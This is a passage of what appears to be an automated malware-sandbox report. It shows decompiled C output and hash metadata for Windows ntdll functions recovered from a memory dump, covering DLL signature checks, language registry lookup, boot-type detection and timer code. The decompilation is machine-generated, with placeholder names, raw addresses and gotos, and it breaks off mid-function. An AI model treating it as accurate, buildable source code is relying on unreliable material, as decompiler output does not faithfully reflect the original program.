                							E01915510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                							_t102 =  *0x1985780; // 0x0
                						}
                						if((_t102 & 0x00000010) != 0) {
                							asm("int3");
                						}
                						_t124 = 0xc0000428;
                						goto L8;
                					}
                					L5:
                					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                						goto L8;
                					}
                					_t77 = _a4 - 0x40000003;
                					if(_t77 == 0 || _t77 == 0x33) {
                						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                						if(E018B7D50() != 0) {
                							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                						} else {
                							_t82 = 0x7ffe0384;
                						}
                						_t108 = 0x7ffe0385;
                						if( *_t82 != 0) {
                							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                								if(E018B7D50() == 0) {
                									_t97 = 0x7ffe0385;
                								} else {
                									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                								}
                								if(( *_t97 & 0x00000020) != 0) {
                									E01917016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                								}
                							}
                						}
                						if(_a4 != 0x40000003) {
                							L14:
                							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                							if(E018B7D50() != 0) {
                								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                							} else {
                								_t87 = 0x7ffe0384;
                							}
                							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                								if(E018B7D50() != 0) {
                									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                								}
                								if(( *_t108 & 0x00000020) != 0) {
                									E01917016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                								}
                							}
                							goto L8;
                						} else {
                							_v16 = _t125 + 0x24;
                							_t124 = E018CA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                							if(_t124 < 0) {
                								E0189B1E1(_t124, 0x1490, 0, _v16);
                								goto L8;
                							}
                							goto L14;
                						}
                					} else {
                						goto L8;
                					}
                				}
                			}

                Strings
                • minkernel\ntdll\ldrmap.c, xrefs: 018F98A2
                • LdrpCompleteMapModule, xrefs: 018F9898
                • Could not validate the crypto signature for DLL %wZ, xrefs: 018F9891
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                • API String ID: 0-1676968949
                • Opcode ID: 24f78c72c22802fab7ad4048116af6c3defb86b5fafef187ac72d27926b14b3d
                • Instruction ID: 34b6712a80e575cbdccda5a8111dacd282351554daed2dfe6d83abdae06b8030
                • Opcode Fuzzy Hash: 24f78c72c22802fab7ad4048116af6c3defb86b5fafef187ac72d27926b14b3d
                • Instruction Fuzzy Hash: E851E031A0078A9BFB21CB6CC984B6A7BE4AB41B18F840599EB51DB3D1D735EF00C791
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 93%
                			E0189E620(void* __ecx, short* __edx, short* _a4) {
                				char _v16;
                				char _v20;
                				intOrPtr _v24;
                				char* _v28;
                				char _v32;
                				char _v36;
                				char _v44;
                				signed int _v48;
                				intOrPtr _v52;
                				void* _v56;
                				void* _v60;
                				char _v64;
                				void* _v68;
                				void* _v76;
                				void* _v84;
                				signed int _t59;
                				signed int _t74;
                				signed short* _t75;
                				signed int _t76;
                				signed short* _t78;
                				signed int _t83;
                				short* _t93;
                				signed short* _t94;
                				short* _t96;
                				void* _t97;
                				signed int _t99;
                				void* _t101;
                				void* _t102;
                
                				_t80 = __ecx;
                				_t101 = (_t99 & 0xfffffff8) - 0x34;
                				_t96 = __edx;
                				_v44 = __edx;
                				_t78 = 0;
                				_v56 = 0;
                				if(__ecx == 0 || __edx == 0) {
                					L28:
                					_t97 = 0xc000000d;
                				} else {
                					_t93 = _a4;
                					if(_t93 == 0) {
                						goto L28;
                					}
                					_t78 = E0189F358(__ecx, 0xac);
                					if(_t78 == 0) {
                						_t97 = 0xc0000017;
                						L6:
                						if(_v56 != 0) {
                							_push(_v56);
                							E018D95D0();
                						}
                						if(_t78 != 0) {
                							L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                						}
                						return _t97;
                					}
                					E018DFA60(_t78, 0, 0x158);
                					_v48 = _v48 & 0x00000000;
                					_t102 = _t101 + 0xc;
                					 *_t96 = 0;
                					 *_t93 = 0;
                					E018DBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                					_v36 = 0x18;
                					_v28 =  &_v44;
                					_v64 = 0;
                					_push( &_v36);
                					_push(0x20019);
                					_v32 = 0;
                					_push( &_v64);
                					_v24 = 0x40;
                					_v20 = 0;
                					_v16 = 0;
                					_t97 = E018D9600();
                					if(_t97 < 0) {
                						goto L6;
                					}
                					E018DBB40(0,  &_v36, L"InstallLanguageFallback");
                					_push(0);
                					_v48 = 4;
                					_t97 = L0189F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                					if(_t97 >= 0) {
                						if(_v52 != 1) {
                							L17:
                							_t97 = 0xc0000001;
                							goto L6;
                						}
                						_t59 =  *_t78 & 0x0000ffff;
                						_t94 = _t78;
                						_t83 = _t59;
                						if(_t59 == 0) {
                							L19:
                							if(_t83 == 0) {
                								L23:
                								E018DBB40(_t83, _t102 + 0x24, _t78);
                								if(L018A43C0( &_v48,  &_v64) == 0) {
                									goto L17;
                								}
                								_t84 = _v48;
                								 *_v48 = _v56;
                								if( *_t94 != 0) {
                									E018DBB40(_t84, _t102 + 0x24, _t94);
                									if(L018A43C0( &_v48,  &_v64) != 0) {
                										 *_a4 = _v56;
                									} else {
                										_t97 = 0xc0000001;
                										 *_v48 = 0;
                									}
                								}
                								goto L6;
                							}
                							_t83 = _t83 & 0x0000ffff;
                							while(_t83 == 0x20) {
                								_t94 =  &(_t94[1]);
                								_t74 =  *_t94 & 0x0000ffff;
                								_t83 = _t74;
                								if(_t74 != 0) {
                									continue;
                								}
                								goto L23;
                							}
                							goto L23;
                						} else {
                							goto L14;
                						}
                						while(1) {
                							L14:
                							_t27 =  &(_t94[1]); // 0x2
                							_t75 = _t27;
                							if(_t83 == 0x2c) {
                								break;
                							}
                							_t94 = _t75;
                							_t76 =  *_t94 & 0x0000ffff;
                							_t83 = _t76;
                							if(_t76 != 0) {
                								continue;
                							}
                							goto L23;
                						}
                						 *_t94 = 0;
                						_t94 = _t75;
                						_t83 =  *_t75 & 0x0000ffff;
                						goto L19;
                					}
                				}
                			}

                Strings
                • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0189E68C
                • @, xrefs: 0189E6C0
                • InstallLanguageFallback, xrefs: 0189E6DB
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                • API String ID: 0-1757540487
                • Opcode ID: d92726197eb7ef754792709929e190440e13afac2e6c3d4c4918c6a43c167342
                • Instruction ID: 9411817b6550f3184ed7d93474d7a0333b8afc6b411e900f1cabd68c891a1fd0
                • Opcode Fuzzy Hash: d92726197eb7ef754792709929e190440e13afac2e6c3d4c4918c6a43c167342
                • Instruction Fuzzy Hash: 0B517FB26083469BDB14DF68C480A6BB7E8BF98715F45092EFA85D7240F734DB04C7A2
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 60%
                			E0195E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
                				signed int _v20;
                				char _v24;
                				signed int _v40;
                				char _v44;
                				intOrPtr _v48;
                				signed int _v52;
                				unsigned int _v56;
                				char _v60;
                				signed int _v64;
                				char _v68;
                				signed int _v72;
                				void* __ebx;
                				void* __edi;
                				char _t87;
                				signed int _t90;
                				signed int _t94;
                				signed int _t100;
                				intOrPtr* _t113;
                				signed int _t122;
                				void* _t132;
                				void* _t135;
                				signed int _t139;
                				signed int* _t141;
                				signed int _t146;
                				signed int _t147;
                				void* _t153;
                				signed int _t155;
                				signed int _t159;
                				char _t166;
                				void* _t172;
                				void* _t176;
                				signed int _t177;
                				intOrPtr* _t179;
                
                				_t179 = __ecx;
                				_v48 = __edx;
                				_v68 = 0;
                				_v72 = 0;
                				_push(__ecx[1]);
                				_push( *__ecx);
                				_push(0);
                				_t153 = 0x14;
                				_t135 = _t153;
                				_t132 = E0195BBBB(_t135, _t153);
                				if(_t132 == 0) {
                					_t166 = _v68;
                					goto L43;
                				} else {
                					_t155 = 0;
                					_v52 = 0;
                					asm("stosd");
                					asm("stosd");
                					asm("stosd");
                					asm("stosd");
                					asm("stosd");
                					_v56 = __ecx[1];
                					if( *__ecx >> 8 < 2) {
                						_t155 = 1;
                						_v52 = 1;
                					}
                					_t139 = _a4;
                					_t87 = (_t155 << 0xc) + _t139;
                					_v60 = _t87;
                					if(_t87 < _t139) {
                						L11:
                						_t166 = _v68;
                						L12:
                						if(_t132 != 0) {
                							E0195BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
                						}
                						L43:
                						if(_v72 != 0) {
                							_push( *((intOrPtr*)(_t179 + 4)));
                							_push( *_t179);
                							_push(0x8000);
                							E0195AFDE( &_v72,  &_v60);
                						}
                						L46:
                						return _t166;
                					}
                					_t90 =  *(_t179 + 0xc) & 0x40000000;
                					asm("sbb edi, edi");
                					_t172 = ( ~_t90 & 0x0000003c) + 4;
                					if(_t90 != 0) {
                						_push(0);
                						_push(0x14);
                						_push( &_v44);
                						_push(3);
                						_push(_t179);
                						_push(0xffffffff);
                						if(E018D9730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
                							_push(_t139);
                							E0195A80D(_t179, 1, _v40, 0);
                							_t172 = 4;
                						}
                					}
                					_t141 =  &_v72;
                					if(E0195A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
                						_v64 = _a4;
                						_t94 =  *(_t179 + 0xc) & 0x40000000;
                						asm("sbb edi, edi");
                						_t176 = ( ~_t94 & 0x0000003c) + 4;
                						if(_t94 != 0) {
                							_push(0);
                							_push(0x14);
                							_push( &_v24);
                							_push(3);
                							_push(_t179);
                							_push(0xffffffff);
                							if(E018D9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
                								_push(_t141);
                								E0195A80D(_t179, 1, _v20, 0);
                								_t176 = 4;
                							}
                						}
                						if(E0195A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
                							goto L11;
                						} else {
                							_t177 = _v64;
                							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
                							_t100 = _v52 + _v52;
                							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
                							 *(_t132 + 0x10) = _t146;
                							asm("bsf eax, [esp+0x18]");
                							_v52 = _t100;
                							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
                							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
                							_t47 =  &_a8;
                							 *_t47 = _a8 & 0x00000001;
                							if( *_t47 == 0) {
                								E018B2280(_t179 + 0x30, _t179 + 0x30);
                							}
                							_t147 =  *(_t179 + 0x34);
                							_t159 =  *(_t179 + 0x38) & 1;
                							_v68 = 0;
                							if(_t147 == 0) {
                								L35:
                								E018AB090(_t179 + 0x34, _t147, _v68, _t132);
                								if(_a8 == 0) {
                									E018AFFB0(_t132, _t177, _t179 + 0x30);
                								}
                								asm("lock xadd [eax], ecx");
                								asm("lock xadd [eax], edx");
                								_t132 = 0;
                								_v72 = _v72 & 0;
                								_v68 = _v72;
                								if(E018B7D50() == 0) {
                									_t113 = 0x7ffe0388;
                								} else {
                									_t177 = _v64;
                									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                								}
                								if( *_t113 == _t132) {
                									_t166 = _v68;
                									goto L46;
                								} else {
                									_t166 = _v68;
                									E0194FEC0(_t132, _t179, _t166, _t177 + 0x1000);
                									goto L12;
                								}
                							} else {
                								L23:
                								while(1) {
                									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
                										_t122 =  *_t147;
                										if(_t159 == 0) {
                											L32:
                											if(_t122 == 0) {
                												L34:
                												_v68 = 0;
                												goto L35;
                											}
                											L33:
                											_t147 = _t122;
                											continue;
                										}
                										if(_t122 == 0) {
                											goto L34;
                										}
                										_t122 = _t122 ^ _t147;
                										goto L32;
                									}
                									_t122 =  *(_t147 + 4);
                									if(_t159 == 0) {
                										L27:
                										if(_t122 != 0) {
                											goto L33;
                										}
                										L28:
                										_v68 = 1;
                										goto L35;
                									}
                									if(_t122 == 0) {
                										goto L28;
                									}
                									_t122 = _t122 ^ _t147;
                									goto L27;
                								}
                							}
                						}
                					}
                					_v72 = _v72 & 0x00000000;
                					goto L11;
                				}
                			}

                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID: `$`
                • API String ID: 0-197956300
                • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                • Instruction ID: 05dd41b8ed577af8b5584a9be9a998602f2c90e770a24d944b3154d97e6e957b
                • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                • Instruction Fuzzy Hash: 4B91AF712043429FE764CE29C840B1BBBE9AF84714F14892DFA99DB280E771EA04CB52
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 77%
                			E019151BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                				signed short* _t63;
                				signed int _t64;
                				signed int _t65;
                				signed int _t67;
                				intOrPtr _t74;
                				intOrPtr _t84;
                				intOrPtr _t88;
                				intOrPtr _t94;
                				void* _t100;
                				void* _t103;
                				intOrPtr _t105;
                				signed int _t106;
                				short* _t108;
                				signed int _t110;
                				signed int _t113;
                				signed int* _t115;
                				signed short* _t117;
                				void* _t118;
                				void* _t119;
                
                				_push(0x80);
                				_push(0x19705f0);
                				E018ED0E8(__ebx, __edi, __esi);
                				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                				_t115 =  *(_t118 + 0xc);
                				 *(_t118 - 0x7c) = _t115;
                				 *((char*)(_t118 - 0x65)) = 0;
                				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                				_t113 = 0;
                				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                				 *((intOrPtr*)(_t118 - 4)) = 0;
                				_t100 = __ecx;
                				if(_t100 == 0) {
                					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                					E018AEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                					 *((char*)(_t118 - 0x65)) = 1;
                					_t63 =  *(_t118 - 0x90);
                					_t101 = _t63[2];
                					_t64 =  *_t63 & 0x0000ffff;
                					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                					L20:
                					_t65 = _t64 >> 1;
                					L21:
                					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                					if(_t108 == 0) {
                						L27:
                						 *_t115 = _t65 + 1;
                						_t67 = 0xc0000023;
                						L28:
                						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                						L29:
                						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                						E019153CA(0);
                						return E018ED130(0, _t113, _t115);
                					}
                					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                							 *_t108 = 0;
                						}
                						goto L27;
                					}
                					 *_t115 = _t65;
                					_t115 = _t65 + _t65;
                					E018DF3E0(_t108, _t101, _t115);
                					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                					_t67 = 0;
                					goto L28;
                				}
                				_t103 = _t100 - 1;
                				if(_t103 == 0) {
                					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                					_t74 = E018B3690(1, _t117, 0x1871810, _t118 - 0x74);
                					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                					_t101 = _t117[2];
                					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                					if(_t74 < 0) {
                						_t64 =  *_t117 & 0x0000ffff;
                						_t115 =  *(_t118 - 0x7c);
                						goto L20;
                					}
                					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                					_t115 =  *(_t118 - 0x7c);
                					goto L21;
                				}
                				if(_t103 == 1) {
                					_t105 = 4;
                					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                					_push(_t118 - 0x70);
                					_push(0);
                					_push(0);
                					_push(_t105);
                					_push(_t118 - 0x78);
                					_push(0x6b);
                					 *((intOrPtr*)(_t118 - 0x64)) = E018DAA90();
                					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                					_t113 = L018B4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                					if(_t113 != 0) {
                						_push(_t118 - 0x70);
                						_push( *((intOrPtr*)(_t118 - 0x70)));
                						_push(_t113);
                						_push(4);
                						_push(_t118 - 0x78);
                						_push(0x6b);
                						_t84 = E018DAA90();
                						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                						if(_t84 < 0) {
                							goto L29;
                						}
                						_t110 = 0;
                						_t106 = 0;
                						while(1) {
                							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                							 *(_t118 - 0x88) = _t106;
                							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                								break;
                							}
                							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                							_t106 = _t106 + 1;
                						}
                						_t88 = E0191500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                						_t119 = _t119 + 0x1c;
                						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                						if(_t88 < 0) {
                							goto L29;
                						}
                						_t101 = _t118 - 0x3c;
                						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                						goto L21;
                					}
                					_t67 = 0xc0000017;
                					goto L28;
                				}
                				_push(0);
                				_push(0x20);
                				_push(_t118 - 0x60);
                				_push(0x5a);
                				_t94 = E018D9860();
                				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                				if(_t94 < 0) {
                					goto L29;
                				}
                				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                					_t101 = L"Legacy";
                					_push(6);
                				} else {
                					_t101 = L"UEFI";
                					_push(4);
                				}
                				_pop(_t65);
                				goto L21;
                			}

                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID: InitializeThunk
                • String ID: Legacy$UEFI
                • API String ID: 2994545307-634100481
                • Opcode ID: df4f2ec883ff30147c9f9a4a448beba8f46c0d0cc29d591958b4daaa84ec072f
                • Instruction ID: cb63c461c44a867cd0bd6994ccb18b0006c9f16bf93bd85cc6fb0ca09a0d456f
                • Opcode Fuzzy Hash: df4f2ec883ff30147c9f9a4a448beba8f46c0d0cc29d591958b4daaa84ec072f
                • Instruction Fuzzy Hash: F1517E71E00609DFEB25DFA8C880AADBBF8FF89700F16442DE609EB255D7719A41CB10
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 76%
                			E018BB944(signed int* __ecx, char __edx) {
                				signed int _v8;
                				signed int _v16;
                				signed int _v20;
                				char _v28;
                				signed int _v32;
                				char _v36;
                				signed int _v40;
                				intOrPtr _v44;
                				signed int* _v48;
                				signed int _v52;
                				signed int _v56;
                				intOrPtr _v60;
                				intOrPtr _v64;
                				intOrPtr _v68;
                				intOrPtr _v72;
                				intOrPtr _v76;
                				char _v77;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				intOrPtr* _t65;
                				intOrPtr _t67;
                				intOrPtr _t68;
                				char* _t73;
                				intOrPtr _t77;
                				intOrPtr _t78;
                				signed int _t82;
                				intOrPtr _t83;
                				void* _t87;
                				char _t88;
                				intOrPtr* _t89;
                				intOrPtr _t91;
                				void* _t97;
                				intOrPtr _t100;
                				void* _t102;
                				void* _t107;
                				signed int _t108;
                				intOrPtr* _t112;
                				void* _t113;
                				intOrPtr* _t114;
                				intOrPtr _t115;
                				intOrPtr _t116;
                				intOrPtr _t117;
                				signed int _t118;
                				void* _t130;
                
                				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                				_v8 =  *0x198d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                				_t112 = __ecx;
                				_v77 = __edx;
                				_v48 = __ecx;
                				_v28 = 0;
                				_t5 = _t112 + 0xc; // 0x575651ff
                				_t105 =  *_t5;
                				_v20 = 0;
                				_v16 = 0;
                				if(_t105 == 0) {
                					_t50 = _t112 + 4; // 0x5de58b5b
                					_t60 =  *__ecx |  *_t50;
                					if(( *__ecx |  *_t50) != 0) {
                						 *__ecx = 0;
                						__ecx[1] = 0;
                						if(E018B7D50() != 0) {
                							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                						} else {
                							_t65 = 0x7ffe0386;
                						}
                						if( *_t65 != 0) {
                							E01968CD6(_t112);
                						}
                						_push(0);
                						_t52 = _t112 + 0x10; // 0x778df98b
                						_push( *_t52);
                						_t60 = E018D9E20();
                					}
                					L20:
                					_pop(_t107);
                					_pop(_t113);
                					_pop(_t87);
                					return E018DB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                				}
                				_t8 = _t112 + 8; // 0x8b000cc2
                				_t67 =  *_t8;
                				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                				_t108 =  *(_t67 + 0x14);
                				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                				_t105 = 0x2710;
                				asm("sbb eax, edi");
                				_v44 = _t88;
                				_v52 = _t108;
                				_t60 = E018DCE00(_t97, _t68, 0x2710, 0);
                				_v56 = _t60;
                				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                					L3:
                					 *(_t112 + 0x44) = _t60;
                					_t105 = _t60 * 0x2710 >> 0x20;
                					 *_t112 = _t88;
                					 *(_t112 + 4) = _t108;
                					_v20 = _t60 * 0x2710;
                					_v16 = _t60 * 0x2710 >> 0x20;
                					if(_v77 != 0) {
                						L16:
                						_v36 = _t88;
                						_v32 = _t108;
                						if(E018B7D50() != 0) {
                							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                						} else {
                							_t73 = 0x7ffe0386;
                						}
                						if( *_t73 != 0) {
                							_t105 = _v40;
                							E01968F6A(_t112, _v40, _t88, _t108);
                						}
                						_push( &_v28);
                						_push(0);
                						_push( &_v36);
                						_t48 = _t112 + 0x10; // 0x778df98b
                						_push( *_t48);
                						_t60 = E018DAF60();
                						goto L20;
                					} else {
                						_t89 = 0x7ffe03b0;
                						do {
                							_t114 = 0x7ffe0010;
                							do {
                								_t77 =  *0x1988628; // 0x0
                								_v68 = _t77;
                								_t78 =  *0x198862c; // 0x0
                								_v64 = _t78;
                								_v72 =  *_t89;
                								_v76 =  *((intOrPtr*)(_t89 + 4));
                								while(1) {
                									_t105 =  *0x7ffe000c;
                									_t100 =  *0x7ffe0008;
                									if(_t105 ==  *_t114) {
                										goto L8;
                									}
                									asm("pause");
                								}
                								L8:
                								_t89 = 0x7ffe03b0;
                								_t115 =  *0x7ffe03b0;
                								_t82 =  *0x7FFE03B4;
                								_v60 = _t115;
                								_t114 = 0x7ffe0010;
                								_v56 = _t82;
                							} while (_v72 != _t115 || _v76 != _t82);
                							_t83 =  *0x1988628; // 0x0
                							_t116 =  *0x198862c; // 0x0
                							_v76 = _t116;
                							_t117 = _v68;
                						} while (_t117 != _t83 || _v64 != _v76);
                						asm("sbb edx, [esp+0x24]");
                						_t102 = _t100 - _v60 - _t117;
                						_t112 = _v48;
                						_t91 = _v44;
                						asm("sbb edx, eax");
                						_t130 = _t105 - _v52;
                						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                							_t88 = _t102 - _t91;
                							asm("sbb edx, edi");
                							_t108 = _t105;
                						} else {
                							_t88 = 0;
                							_t108 = 0;
                						}
                						goto L16;
                					}
                				} else {
                					if( *(_t112 + 0x44) == _t60) {
                						goto L20;
                					}
                					goto L3;
                				}
                			}

                APIs
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 018BB9A5
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                • String ID:
                • API String ID: 885266447-0
                • Opcode ID: 4b7aa5d930aed810797930845a6b976a3a2ae0b66c324b35507bb105fef904ca
                • Instruction ID: 8db232d556e0cebf4fde681842c3f093cdae240f07d6bca3b571462d14bf3075
                • Opcode Fuzzy Hash: 4b7aa5d930aed810797930845a6b976a3a2ae0b66c324b35507bb105fef904ca
                • Instruction Fuzzy Hash: A0515671A09341CFC721CF2CC4C092ABBE9BB88714F54896EEA95D7355D770EA44CB92
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 78%
                			E0189B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                				signed int _t65;
                				signed short _t69;
                				intOrPtr _t70;
                				signed short _t85;
                				void* _t86;
                				signed short _t89;
                				signed short _t91;
                				intOrPtr _t92;
                				intOrPtr _t97;
                				intOrPtr* _t98;
                				signed short _t99;
                				signed short _t101;
                				void* _t102;
                				char* _t103;
                				signed short _t104;
                				intOrPtr* _t110;
                				void* _t111;
                				void* _t114;
                				intOrPtr* _t115;
                
                				_t109 = __esi;
                				_t108 = __edi;
                				_t106 = __edx;
                				_t95 = __ebx;
                				_push(0x90);
                				_push(0x196f7a8);
                				E018ED0E8(__ebx, __edi, __esi);
                				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                				if(__edx == 0xffffffff) {
                					L6:
                					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                					__eflags = _t65 & 0x00000002;
                					if((_t65 & 0x00000002) != 0) {
                						L3:
                						L4:
                						return E018ED130(_t95, _t108, _t109);
                					}
                					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                					_t108 = 0;
                					_t109 = 0;
                					_t95 = 0;
                					__eflags = 0;
                					while(1) {
                						__eflags = _t95 - 0x200;
                						if(_t95 >= 0x200) {
                							break;
                						}
                						E018DD000(0x80);
                						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                						_t108 = _t115;
                						_t95 = _t95 - 0xffffff80;
                						_t17 = _t114 - 4;
                						 *_t17 =  *(_t114 - 4) & 0x00000000;
                						__eflags =  *_t17;
                						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                						_t102 = _t110 + 1;
                						do {
                							_t85 =  *_t110;
                							_t110 = _t110 + 1;
                							__eflags = _t85;
                						} while (_t85 != 0);
                						_t111 = _t110 - _t102;
                						_t21 = _t95 - 1; // -129
                						_t86 = _t21;
                						__eflags = _t111 - _t86;
                						if(_t111 > _t86) {
                							_t111 = _t86;
                						}
                						E018DF3E0(_t108, _t106, _t111);
                						_t115 = _t115 + 0xc;
                						_t103 = _t111 + _t108;
                						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                						_t89 = _t95 - _t111;
                						__eflags = _t89;
                						_push(0);
                						if(_t89 == 0) {
                							L15:
                							_t109 = 0xc000000d;
                							goto L16;
                						} else {
                							__eflags = _t89 - 0x7fffffff;
                							if(_t89 <= 0x7fffffff) {
                								L16:
                								 *(_t114 - 0x94) = _t109;
                								__eflags = _t109;
                								if(_t109 < 0) {
                									__eflags = _t89;
                									if(_t89 != 0) {
                										 *_t103 = 0;
                									}
                									L26:
                									 *(_t114 - 0xa0) = _t109;
                									 *(_t114 - 4) = 0xfffffffe;
                									__eflags = _t109;
                									if(_t109 >= 0) {
                										L31:
                										_t98 = _t108;
                										_t39 = _t98 + 1; // 0x1
                										_t106 = _t39;
                										do {
                											_t69 =  *_t98;
                											_t98 = _t98 + 1;
                											__eflags = _t69;
                										} while (_t69 != 0);
                										_t99 = _t98 - _t106;
                										__eflags = _t99;
                										L34:
                										_t70 =  *[fs:0x30];
                										__eflags =  *((char*)(_t70 + 2));
                										if( *((char*)(_t70 + 2)) != 0) {
